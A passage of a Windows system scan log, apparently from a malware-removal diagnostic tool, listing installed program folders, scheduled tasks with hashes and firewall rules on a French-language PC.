[17/08/2012 09:53:56] - |RD| - [174] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
[22/01/2014 19:10:27] - |D| - [3008] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
[16/04/2015 15:18:01] - |D| - [2252] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YouWave_Android
[17/08/2012 09:53:56] - |ASH| - [174] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini

---------- | C:\ProgramData

[06/04/2014 16:50:45] - |D| - [999734249] - C:\ProgramData\Ableton
[17/08/2012 10:08:35] - |D| - [189405996] - C:\ProgramData\Adobe
[14/07/2009 07:08:56] - |SHD| - [43905426908] - C:\ProgramData\Application Data
[25/06/2016 22:31:15] - |D| - [13567835] - C:\ProgramData\AVAST Software
[22/01/2014 18:23:22] - |D| - [104235801] - C:\ProgramData\Battle.net
[16/04/2015 15:29:52] - |D| - [244305188] - C:\ProgramData\BlueStacksSetup
[25/01/2014 14:36:42] - |D| - [8250] - C:\ProgramData\Bouygues Telecom
[17/08/2012 09:53:24] - |SHD| - [7098182] - C:\ProgramData\Bureau
[18/11/2015 21:27:43] - |D| - [104] - C:\ProgramData\Camfrog Update
[17/08/2012 10:13:55] - |D| - [0] - C:\ProgramData\Canneverbe Limited
[31/10/2013 14:31:51] - |HD| - [174232] - C:\ProgramData\CanonBJ
[31/10/2015 19:21:21] - |HD| - [96] - C:\ProgramData\Common Files
[14/07/2009 07:08:56] - |SHD| - [7098182] - C:\ProgramData\Desktop
[14/07/2009 07:08:56] - |SHD| - [124036720] - C:\ProgramData\Documents
[17/08/2012 09:53:24] - |SHD| - [0] - C:\ProgramData\Favoris
[14/07/2009 07:08:56] - |SHD| - [0] - C:\ProgramData\Favorites
[19/05/2016 20:40:36] - |D| - [520] - C:\ProgramData\IsolatedStorage
[25/06/2016 20:30:29] - |D| - [11571802] - C:\ProgramData\Malwarebytes
[17/07/2016 23:17:41] - |D| - [1026] - C:\ProgramData\McAfee
[17/07/2016 23:17:41] - |D| - [855] - C:\ProgramData\McAfee Security Scan
[17/08/2012 09:53:24] - |SHD| - [381836] - C:\ProgramData\Menu Démarrer
[14/07/2009 05:20:08] - |SD| - [2170735329] - C:\ProgramData\Microsoft
[12/11/2013 17:35:52] - |D| - [0] - C:\ProgramData\Microsoft OneDrive
[17/08/2012 09:53:24] - |SHD| - [0] - C:\ProgramData\Modèles
[08/02/2013 16:51:34] - |D| - [565] - C:\ProgramData\Mozilla
[28/10/2013 23:09:56] - |RASH| - [290] - C:\ProgramData\ntuser.pol
[25/02/2014 22:25:29] - |D| - [70997662] - C:\ProgramData\Oracle
[16/01/2016 13:05:02] - |D| - [7369391] - C:\ProgramData\Package Cache
[08/02/2013 16:43:23] - |D| - [131605168] - C:\ProgramData\Skype
[26/06/2016 22:44:18] - |D| - [8898194] - C:\ProgramData\Spybot - Search & Destroy
[14/07/2009 07:08:56] - |SHD| - [381836] - C:\ProgramData\Start Menu
[25/10/2012 23:43:03] - |D| - [189] - C:\ProgramData\Sun
[08/03/2014 18:44:59] - |D| - [0] - C:\ProgramData\Temp
[14/07/2009 07:08:56] - |SHD| - [0] - C:\ProgramData\Templates
[31/10/2015 19:21:21] - |D| - [966902] - C:\ProgramData\TuneUp Software
[17/08/2012 13:42:50] - |D| - [0] - C:\ProgramData\VirtualizedApplications
[04/10/2013 11:58:12] - |D| - [97] - C:\ProgramData\WarThunder
[24/03/2013 10:26:08] - |D| - [507863] - C:\ProgramData\WebGamePlay

---------- | C:\ProgramData\Microsoft\Windows\Start Menu

[14/07/2009 06:49:40] - |ASH| - [442] - C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini
[17/08/2012 09:53:24] - |SHD| - [190064] - C:\ProgramData\Microsoft\Windows\Start Menu\Programmes
[14/07/2009 05:20:08] - |D| - [190064] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs
[14/07/2009 06:49:40] - |A| - [1266] - C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk

---------- | C:\ProgramData\Microsoft\Windows\Start Menu\Programs

[14/07/2009 05:20:08] - |RD| - [37926] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
[17/05/2015 11:02:23] - |A| - [2441] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
[14/07/2009 07:32:38] - |RD| - [18363] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools
[27/01/2013 19:20:09] - |D| - [3304] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BurnAware Free
[30/03/2014 20:47:32] - |D| - [10478] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Catalyst Control Center
[13/06/2015 10:37:57] - |D| - [932] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
[16/02/2013 18:49:20] - |D| - [2207] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chronotron Inc
[14/07/2009 06:54:23] - |ASH| - [950] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
[31/10/2015 19:16:04] - |D| - [6692] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVDVideoSoft
[14/07/2009 07:32:38] - |RD| - [8098] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
[13/06/2015 10:44:27] - |A| - [2233] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
[19/10/2013 11:17:10] - |D| - [6118] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Haali Media Splitter
[07/02/2013 12:25:02] - |RD| - [1614] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel
[17/08/2012 10:02:20] - |D| - [4884] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IZArc
[25/02/2014 22:25:04] - |D| - [6890] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[14/07/2009 05:20:08] - |RD| - [4370] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance
[25/06/2016 20:30:39] - |D| - [3721] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
[30/06/2016 12:09:02] - |D| - [3055] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
[17/08/2012 10:23:02] - |D| - [14958] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Starter (Français)
[17/08/2012 10:07:45] - |A| - [2127] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk
[16/03/2013 13:02:11] - |D| - [2275] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
[22/12/2014 17:44:51] - |A| - [1315] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movie Maker.lnk
[09/11/2014 21:54:42] - |A| - [1075] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
[26/09/2013 09:29:45] - |A| - [327] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\new shortcut.lnk
[22/12/2014 17:44:42] - |A| - [1384] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk
[17/08/2012 10:06:02] - |D| - [3270] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Picasa 3
[23/01/2016 19:32:03] - |D| - [2147] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
[24/02/2013 01:45:01] - |D| - [7006] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SnowFox Software
[14/07/2009 05:20:08] - |RD| - [2495] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
[03/10/2013 14:32:34] - |D| - [8028] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
[17/08/2012 10:05:45] - |A| - [2557] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visionneuse Microsoft PowerPoint .lnk
[16/02/2013 18:45:21] - |D| - [2832] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp
[22/12/2014 17:42:53] - |RD| - [5193] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live
[22/12/2014 17:44:16] - |A| - [1468] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Mail.lnk
[22/12/2014 17:43:59] - |A| - [2496] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Messenger.lnk
[22/01/2014 19:10:27] - |D| - [2954] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
[16/07/2016 14:55:57] - |D| - [1881] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ZHP

---------- | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

[14/07/2009 06:54:23] - |ASH| - [174] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
[08/02/2015 13:26:04] - |A| - [2321] - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk

---------- | C:\Program Files (x86)

[25/10/2012 17:45:24] - |D| - [221041140] - C:\Program Files (x86)\Adobe
[27/03/2014 13:09:17] - |D| - [32165] - C:\Program Files (x86)\ATI
[07/02/2013 12:22:55] - |D| - [88462914] - C:\Program Files (x86)\ATI Technologies
[28/10/2013 23:09:22] - |D| - [5615] - C:\Program Files (x86)\Bouygues Telecom
[27/01/2013 19:20:03] - |D| - [25794630] - C:\Program Files (x86)\BurnAware Free
[25/02/2013 20:36:37] - |D| - [25508920] - C:\Program Files (x86)\Camfrog
[16/02/2013 18:48:42] - |D| - [1923601] - C:\Program Files (x86)\Chronotron Inc
[07/02/2013 12:22:08] - |D| - [3598306] - C:\Program Files (x86)\Cisco
[14/07/2009 05:20:08] - |D| - [564268788] - C:\Program Files (x86)\Common Files
[14/07/2009 06:54:24] - |ASH| - [174] - C:\Program Files (x86)\desktop.ini
[24/01/2014 19:54:10] - |D| - [3370151] - C:\Program Files (x86)\DIGITAL HAPPINESS
[31/10/2015 19:15:02] - |D| - [5826938] - C:\Program Files (x86)\DVDVideoSoft
[17/08/2012 10:05:53] - |D| - [611927724] - C:\Program Files (x86)\Google
[07/02/2013 12:23:00] - |HD| - [8480920] - C:\Program Files (x86)\InstallShield Installation Information
[07/02/2013 12:21:42] - |D| - [36275770] - C:\Program Files (x86)\Intel
[14/07/2009 05:20:08] - |D| - [10534137] - C:\Program Files (x86)\Internet Explorer
[17/08/2012 10:02:18] - |D| - [16302012] - C:\Program Files (x86)\IZArc
[25/10/2012 23:42:49] - |D| - [328558526] - C:\Program Files (x86)\Java
[07/02/2013 12:20:58] - |D| - [7474232] - C:\Program Files (x86)\Launch Manager
[25/06/2016 20:30:29] - |D| - [59437593] - C:\Program Files (x86)\Malwarebytes Anti-Malware
[17/08/2012 10:22:04] - |D| - [12039888] - C:\Program Files (x86)\Microsoft Application Virtualization Client
[17/08/2012 10:05:39] - |D| - [34664100] - C:\Program Files (x86)\Microsoft Office
[17/08/2012 10:07:34] - |D| - [1677224] - C:\Program Files (x86)\Microsoft Security Client
[16/03/2013 13:00:56] - |D| - [42886030] - C:\Program Files (x86)\Microsoft Silverlight
[12/11/2013 17:36:09] - |D| - [5525968] - C:\Program Files (x86)\Microsoft SkyDrive
[22/12/2014 17:44:28] - |D| - [1829877] - C:\Program Files (x86)\Microsoft SQL Server Compact Edition
[22/08/2012 10:02:29] - |D| - [8175999] - C:\Program Files (x86)\Microsoft.NET
[18/06/2016 20:35:45] - |D| - [97261270] - C:\Program Files (x86)\mozilla firefox
[09/11/2014 21:54:36] - |D| - [289743] - C:\Program Files (x86)\Mozilla Maintenance Service
[15/12/2014 10:11:35] - |D| - [25757] - C:\Program Files (x86)\MSBuild
[17/08/2012 10:05:15] - |D| - [66546585] - C:\Program Files (x86)\MSECache
[23/01/2014 15:14:55] - |D| - [0] - C:\Program Files (x86)\Pando Networks
[22/01/2014 16:13:15] - |D| - [204670] - C:\Program Files (x86)\portal prelude
[07/02/2013 12:24:25] - |D| - [3375865] - C:\Program Files (x86)\Realtek
[15/12/2014 10:11:35] - |D| - [39175425] - C:\Program Files (x86)\Reference Assemblies
[23/01/2016 19:32:02] - |RD| - [80154501] - C:\Program Files (x86)\Skype
[24/02/2013 01:44:59] - |D| - [8234330] - C:\Program Files (x86)\SnowFox Software
[26/06/2016 22:44:08] - |D| - [10207996] - C:\Program Files (x86)\Spybot - Search & Destroy 2
[07/02/2013 12:24:23] - |HD| - [0] - C:\Program Files (x86)\Temp
[24/01/2014 22:31:08] - |D| - [10915] - C:\Program Files (x86)\Turbine
[14/07/2009 06:57:06] - |HD| - [0] - C:\Program Files (x86)\Uninstall Information
[17/08/2012 10:20:31] - |D| - [140906711] - C:\Program Files (x86)\VideoLAN
[04/10/2013 11:57:59] - |D| - [57967109] - C:\Program Files (x86)\WarThunder
[16/02/2013 18:44:10] - |D| - [44731991] - C:\Program Files (x86)\Winamp
[14/07/2009 07:32:38] - |D| - [524800] - C:\Program Files (x86)\Windows Defender
[22/12/2014 17:40:57] - |D| - [159302903] - C:\Program Files (x86)\Windows Live
[14/07/2009 05:20:08] - |D| - [6181376] - C:\Program Files (x86)\Windows Mail
[14/07/2009 05:20:08] - |D| - [12197556] - C:\Program Files (x86)\Windows NT
[14/07/2009 07:32:38] - |D| - [4417800] - C:\Program Files (x86)\Windows Photo Viewer
[14/07/2009 07:32:38] - |D| - [189952] - C:\Program Files (x86)\Windows Portable Devices
[31/10/2015 19:25:18] - |D| - [350731] - C:\Program Files (x86)\Windows Sidebar
[10/10/2013 22:01:49] - |D| - [390] - C:\Program Files (x86)\WinRAR
[16/07/2016 14:55:53] - |D| - [7233265] - C:\Program Files (x86)\ZHPFix

---------- | C:\Program Files

[07/02/2013 12:22:50] - |D| - [27585242] - C:\Program Files\ATI
[30/03/2014 20:45:37] - |D| - [28] - C:\Program Files\ATI Technologies
[09/07/2016 09:25:46] - |D| - [292105006] - C:\Program Files\AVAST Software
[07/02/2013 12:21:05] - |D| - [13383432] - C:\Program Files\Broadcom
[13/06/2015 10:37:41] - |D| - [17751848] - C:\Program Files\CCleaner
[14/07/2009 05:20:08] - |D| - [50413106] - C:\Program Files\Common Files
[14/07/2009 06:54:24] - |ASH| - [174] - C:\Program Files\desktop.ini
[14/07/2009 07:32:38] - |D| - [4891318] - C:\Program Files\DVD Maker
[17/08/2012 09:53:24] - |SHD| - [50413106] - C:\Program Files\Fichiers communs
[14/07/2009 05:20:08] - |D| - [30571396] - C:\Program Files\Internet Explorer
[14/07/2009 07:32:38] - |D| - [149237810] - C:\Program Files\Microsoft Games
[17/08/2012 10:22:05] - |D| - [1612463] - C:\Program Files\Microsoft Office
[12/11/2013 17:07:44] - |D| - [0] - C:\Program Files\Microsoft Office 15
[17/08/2012 10:07:31] - |D| - [29031814] - C:\Program Files\Microsoft Security Client
[16/03/2013 13:00:56] - |D| - [55717262] - C:\Program Files\Microsoft Silverlight
[15/12/2014 10:11:27] - |D| - [25757] - C:\Program Files\MSBuild
[29/01/2014 12:50:05] - |D| - [1094421] - C:\Program Files\Portal Latinloaders.Tk
[07/02/2013 12:24:52] - |D| - [33819320] - C:\Program Files\Realtek
[15/12/2014 10:11:27] - |D| - [36834473] - C:\Program Files\Reference Assemblies
[14/07/2009 07:09:26] - |HD| - [0] - C:\Program Files\Uninstall Information
[14/07/2009 07:32:38] - |D| - [4039680] - C:\Program Files\Windows Defender
[22/12/2014 17:42:06] - |D| - [312914] - C:\Program Files\Windows Live
[14/07/2009 05:20:08] - |D| - [6667776] - C:\Program Files\Windows Mail
[14/07/2009 07:32:38] - |D| - [0] - C:\Program Files\Windows Media Player
[14/07/2009 05:20:08] - |D| - [12627636] - C:\Program Files\Windows NT
[14/07/2009 07:32:38] - |D| - [5516056] - C:\Program Files\Windows Photo Viewer
[14/07/2009 07:32:38] - |D| - [244736] - C:\Program Files\Windows Portable Devices
[31/10/2015 19:25:19] - |D| - [0] - C:\Program Files\Windows Sidebar
[22/01/2014 19:10:12] - |D| - [6092646] - C:\Program Files\WinRAR

---------- | C:\Program Files (x86)\Common Files

[25/10/2012 17:45:24] - |D| - [9245307] - C:\Program Files (x86)\Common Files\Adobe
[27/11/2013 22:19:22] - |D| - [28429088] - C:\Program Files (x86)\Common Files\Adobe AIR
[09/07/2016 09:45:57] - |D| - [890375] - C:\Program Files (x86)\Common Files\AV
[17/08/2012 10:22:06] - |D| - [99992] - C:\Program Files (x86)\Common Files\DESIGNER
[31/10/2015 19:15:03] - |D| - [113731599] - C:\Program Files (x86)\Common Files\DVDVideoSoft
[07/02/2013 12:24:18] - |D| - [2106564] - C:\Program Files (x86)\Common Files\InstallShield
[07/02/2013 12:31:58] - |D| - [179455] - C:\Program Files (x86)\Common Files\Intel Corporation
[09/07/2016 10:15:34] - |D| - [1966664] - C:\Program Files (x86)\Common Files\Java
[14/07/2009 05:20:08] - |D| - [137311595] - C:\Program Files (x86)\Common Files\microsoft shared
[28/10/2013 23:09:22] - |D| - [577536] - C:\Program Files (x86)\Common Files\PctelEapPeer Authentication
[07/02/2013 12:25:25] - |D| - [161212] - C:\Program Files (x86)\Common Files\postureAgent
[06/04/2014 16:53:19] - |D| - [1707520] - C:\Program Files (x86)\Common Files\Propellerhead Software
[16/02/2013 18:44:17] - |D| - [4780336] - C:\Program Files (x86)\Common Files\PX Storage Engine
[14/07/2009 05:20:08] - |D| - [2702] - C:\Program Files (x86)\Common Files\Services
[10/05/2016 21:35:55] - |D| - [2399872] - C:\Program Files (x86)\Common Files\Skype
[14/07/2009 05:20:08] - |D| - [41103783] - C:\Program Files (x86)\Common Files\SpeechEngines
[14/07/2009 05:20:08] - |D| - [10241523] - C:\Program Files (x86)\Common Files\System
[17/08/2012 10:10:06] - |D| - [209333665] - C:\Program Files (x86)\Common Files\Windows Live

---------- | C:\Program Files\Common files

[26/06/2016 22:51:29] - |D| - [2729679] - C:\Program Files\Common files\AV
[14/07/2009 05:20:08] - |D| - [34881762] - C:\Program Files\Common files\Microsoft Shared
[14/07/2009 05:20:08] - |D| - [2702] - C:\Program Files\Common files\Services
[14/07/2009 05:20:08] - |D| - [608768] - C:\Program Files\Common files\SpeechEngines
[14/07/2009 05:20:08] - |D| - [12190195] - C:\Program Files\Common files\System

---------- | Tasks

[MD5.C0E5C69F346F1870F45B3B31FB8194BE] - [17/08/2012 11:20:41] - |A| - [1002] - C:\Windows\Tasks\Adobe Flash Player Updater.job
[MD5.744521AB800C11A66ADCDA99879D0E71] - [29/09/2013 22:50:28] - |A| - [930] - C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-3594765525-3045979897-1626392610-1000Core.job
[MD5.D291D7D88488575FA78286C1373F461C] - [29/09/2013 22:50:29] - |A| - [952] - C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-3594765525-3045979897-1626392610-1000UA.job
[MD5.A4D7862E57348F03935E42AF857FB859] - [13/06/2015 10:30:01] - |A| - [1066] - C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
[MD5.0B9D11767C819DCF9BA99578A2851F13] - [13/06/2015 10:30:02] - |A| - [1070] - C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
[MD5.F1A6CD5ADAAB953A6764EA364E17BFB8] - [14/07/2009 07:08:49] - |AH| - [6] - C:\Windows\Tasks\SA.DAT
[MD5.8728C0F4FBE689D86030184CDBB991BB] - [14/07/2009 07:08:49] - |A| - [32496] - C:\Windows\Tasks\SCHEDLGU.TXT
[MD5.DA4172293D861811BA5FEB8986FA4376] - [30/01/2015 22:42:57] - |A| - [4476] - C:\Windows\System32\Tasks\Adobe Acrobat Update Task         :   C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
[MD5.305E33B2C237771801A99E50C75FD4AD] - [17/08/2012 11:20:41] - |A| - [3940] - C:\Windows\System32\Tasks\Adobe Flash Player Updater         :   C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
[MD5.00000000000000000000000000000000] - [09/07/2016 09:46:01] - |D| - [3860] - C:\Windows\System32\Tasks\AVAST Software
[MD5.830E3D2D75DB80CAA9038390CF4BDB70] - [13/06/2015 10:37:59] - |A| - [2806] - C:\Windows\System32\Tasks\CCleanerSkipUAC         :   "C:\Program Files\CCleaner\CCleaner.exe"
[MD5.A5028540B46941D7EAEED73A15A57760] - [29/09/2013 22:50:28] - |A| - [3572] - C:\Windows\System32\Tasks\FacebookUpdateTaskUserS-1-5-21-3594765525-3045979897-1626392610-1000Core         :   C:\Users\Utilisateur\AppData\Local\Facebook\Update\FacebookUpdate.exe
[MD5.58D5F047764CEBB559F2A7F96F8B8A3B] - [29/09/2013 22:50:29] - |A| - [3940] - C:\Windows\System32\Tasks\FacebookUpdateTaskUserS-1-5-21-3594765525-3045979897-1626392610-1000UA         :   C:\Users\Utilisateur\AppData\Local\Facebook\Update\FacebookUpdate.exe
[MD5.57B17F398302D7B42159E614A8214C6A] - [13/06/2015 10:30:01] - |A| - [3814] - C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore         :   C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
[MD5.A57FF800CA7135F8E61CCC57EAD42063] - [13/06/2015 10:30:02] - |A| - [4066] - C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA         :   C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
[MD5.00000000000000000000000000000000] - [14/07/2009 05:20:13] - |D| - [254648] - C:\Windows\System32\Tasks\Microsoft
[MD5.00000000000000000000000000000000] - [17/08/2012 10:22:24] - |D| - [4392] - C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform
[MD5.00000000000000000000000000000000] - [26/06/2016 22:44:47] - |D| - [0] - C:\Windows\System32\Tasks\Safer-Networking
[MD5.00000000000000000000000000000000] - [14/07/2009 07:09:57] - |D| - [0] - C:\Windows\System32\Tasks\WPD
[MD5.0B0DB77AE4EA9A7D7C76775F1521E5F9] - [22/01/2014 16:34:27] - |A| - [3232] - C:\Windows\System32\Tasks\{45C379C2-D486-4819-8E1F-A1FD3FB05163}         :   C:\Windows\system32\pcalua.exe
[MD5.C378459496989D5AB48E8DF7AF993F75] - [16/02/2013 19:02:28] - |A| - [3170] - C:\Windows\System32\Tasks\{4C05A43F-7487-4EE2-82DF-31BB92C59D4D}         :   C:\Windows\system32\pcalua.exe
[MD5.23506FD2169392AD23684FEF2E16CF60] - [24/02/2013 18:17:28] - |A| - [3176] - C:\Windows\System32\Tasks\{9D1D9243-51FF-4CDB-BC8F-39BE3FD2AECE}         :   C:\Windows\system32\pcalua.exe
[MD5.9EEC43C1DB4F5BDCE24ACC9713956BE9] - [06/02/2016 12:00:45] - |A| - [2978] - C:\Windows\System32\Tasks\{A58DF23B-BB22-4B12-908D-BAF530C14D7A}         :   C:\Program Files (x86)\Java\jre7\bin\javacpl.exe
[MD5.A64D4C4DE80517351C67DA3781FBACC2] - [22/01/2014 16:26:52] - |A| - [3256] - C:\Windows\System32\Tasks\{C16466EF-6E45-41B5-8A2F-27861FC454DE}         :   C:\Windows\system32\pcalua.exe
[MD5.00000000000000000000000000000000] - [14/07/2009 05:20:14] - |D| - [0] - C:\Windows\Syswow64\Tasks\Microsoft

---------- | Firewall

[HKLM\SYSTEM\CurrentControlSet\Services\sharedaccess\Parameters\FirewallPolicy\FirewallRules]
"Netlogon-NamedPipe-In"=v2.10|Action=Allow|Active=FALSE|Dir=In|Protocol=6|LPort=445|App=System|Name=@netlogon.dll,-1003|Desc=@netlogon.dll,-1006|EmbedCtxt=@netlogon.dll,-1010|
"TCP Query User{808FA7CA-466D-4C41-86F4-9710DE94150E}C:\program files (x86)\xbmc\xbmc.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\program files (x86)\xbmc\xbmc.exe|Name=XBMC|Desc=XBMC|Defer=User|
"UDP Query User{952DA755-82E7-45D8-B73B-2A33E5A0E88C}C:\program files (x86)\xbmc\xbmc.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\program files (x86)\xbmc\xbmc.exe|Name=XBMC|Desc=XBMC|Defer=User|
"{7FBD4AFC-7775-4F64-98CE-AF18EEBCC5ED}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|LPort=48113|RA4=LocalSubnet|RA6=LocalSubnet|Name=maconfig_tcp|
"{6828A2C6-40F3-405C-8F2B-61226BA08022}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|LPort=48113|RA4=LocalSubnet|RA6=LocalSubnet|Name=maconfig_udp|
"{E6DD4D1B-2C0E-4AB6-9898-7BB541BB8F05}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|RA4=LocalSubnet|RA6=LocalSubnet|App=C:\Program Files\ma-config.com\x64\maconfservice.exe|Name=maconfservice|
"{1AAA3C96-E030-4A82-91CB-735C61B6DF01}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|RA4=LocalSubnet|RA6=LocalSubnet|App=C:\Program Files\ma-config.com\x64\maconfservice.exe|Name=maconfservice|
"{59B3EBB3-3F67-46D0-A231-DFA12D7F3320}"=v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\Skype\Phone\Skype.exe|Name=Skype|
"TCP Query User{8DE3CAFE-9D25-44BF-B79F-DB16C9358245}C:\program files (x86)\winamp\winamp.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\program files (x86)\winamp\winamp.exe|Name=Winamp|Desc=Winamp|Defer=User|
"UDP Query User{AC113C11-0C9A-4DC8-BF5A-91F0D2868C00}C:\program files (x86)\winamp\winamp.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\program files (x86)\winamp\winamp.exe|Name=Winamp|Desc=Winamp|Defer=User|
"TCP Query User{BFB3622C-B875-4332-984F-58FC6D8C1D5C}C:\program files (x86)\winamp\winamp.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Public|App=C:\program files (x86)\winamp\winamp.exe|Name=Winamp|Desc=Winamp|Defer=User|
"UDP Query User{30EF7104-050F-44CE-8BC5-674B421358F7}C:\program files (x86)\winamp\winamp.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\program files (x86)\winamp\winamp.exe|Name=Winamp|Desc=Winamp|Defer=User|
"TCP Query User{9F0F176C-956E-445B-B910-B7973D5DF1E8}C:\games\world_of_tanks\wotlauncher.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\games\world_of_tanks\wotlauncher.exe|Name=WoTLauncher|Desc=WoTLauncher|
"UDP Query User{80F5B872-EBCC-416D-A9ED-E1E7F822A53C}C:\games\world_of_tanks\wotlauncher.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\games\world_of_tanks\wotlauncher.exe|Name=WoTLauncher|Desc=WoTLauncher|
"TCP Query User{A1C3A119-3CFD-43B3-9C6A-1DBDEF84D58A}C:\games\world_of_tanks\worldoftanks.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\games\world_of_tanks\worldoftanks.exe|Name=WorldOfTanks|Desc=WorldOfTanks|Defer=User|
"UDP Query User{C9521A13-073C-4087-B055-1C7C2EA23B39}C:\games\world_of_tanks\worldoftanks.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\games\world_of_tanks\worldoftanks.exe|Name=WorldOfTanks|Desc=WorldOfTanks|Defer=User|
"{2BCA1B26-228A-4731-AC93-AAB78383482F}"=v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\Utilisateur\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe|Name=Microsoft SkyDrive|
"{7AA763A8-F33F-4A15-BBBD-A2D0EE1657B0}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\ProgramData\Battle.net\Agent\Agent.1675\Agent.exe|Name=Battle.net Update Agent|
"{EE5A0120-060F-4258-BD6A-095640FA01EA}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\ProgramData\Battle.net\Agent\Agent.1675\Agent.exe|Name=Battle.net Update Agent|
"{48535169-E7BE-4828-85F9-ABDC42657E7C}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\ProgramData\Battle.net\Agent\Agent.2380\Agent.exe|Name=Battle.net Update Agent|
"{7D93426B-466D-4BF7-B915-72B8F366A8AA}"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\ProgramData\Battle.net\Agent\Agent.2380\Agent.exe|Name=Battle.net Update Agent|
"TCP Query User{74DD0F55-BEE0-4183-A573-A0955ED89A92}C:\program files (x86)\turbine\dungeons & dragons online\dndclient.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=C:\program files (x86)\turbine\dungeons & dragons online\dndclient.exe|Name=dndclient|Desc=dndclient|Defer=User|
"UDP Query User{ABF3D190-03C3-43AC-81CB-48C2E1019804}C:\program files (x86)\turbine\dungeons & dragons online\dndclient.exe"=v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=C:\program files (x86)\turbine\dungeons & dragons online\dndclient.exe|Name=dndclient|Desc=dndclient|Defer=User|
